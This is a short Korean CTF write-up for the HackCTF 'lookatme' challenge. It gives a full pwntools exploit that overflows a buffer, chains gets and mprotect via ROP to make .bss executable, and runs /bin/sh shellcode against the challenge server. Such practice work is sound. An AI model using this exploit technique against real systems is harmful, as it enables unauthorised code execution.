전에 라젠카에서 봤었던 내용이었다
03.ROP(Return Oriented Programming) - mmap, mprotect - TechNote - Lazenca.0x0
Excuse the ads! We need some help to keep our site up. List ROP(Return Oriented Programming) - mmap, mprotect ROP를 이용하여 메모리 영역을 할당(mmap)하거나 할당된 메모리 영역의 권한을 변경(mprotect)하는 방법에 대해 설
www.lazenca.net
해당 내용을 참고하여 풀었다
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3017)
e = ELF('./lookatme')
context.arch = 'i386'
shellcode = asm(shellcraft.i386.sh())
gets = 0x804f120
pr = 0x08048480
mprotect = 0x806e0f0
pppr = 0x0806f028
bss = 0x80eaf80
payload = 'A'*28
payload += p32(gets)
payload += p32(pr)
payload += p32(bss)
payload += p32(mprotect)
payload += p32(pppr)
payload += p32(0x80ea000)
payload += p32(0x2000)
payload += p32(0x7)
payload += p32(bss)
r.sendline(payload)
r.send(shellcode)
r.interactive()'HackCTF' 카테고리의 다른 글
| HackCTF - Pwning (0) | 2021.11.22 |
|---|---|
| HackCTF - Gift (0) | 2021.11.22 |
| HackCTF - Beginner_Heap (0) | 2021.11.22 |
| HackCTF - RTL_Core (0) | 2021.11.21 |
| HackCTF - Random Key (0) | 2021.11.21 |
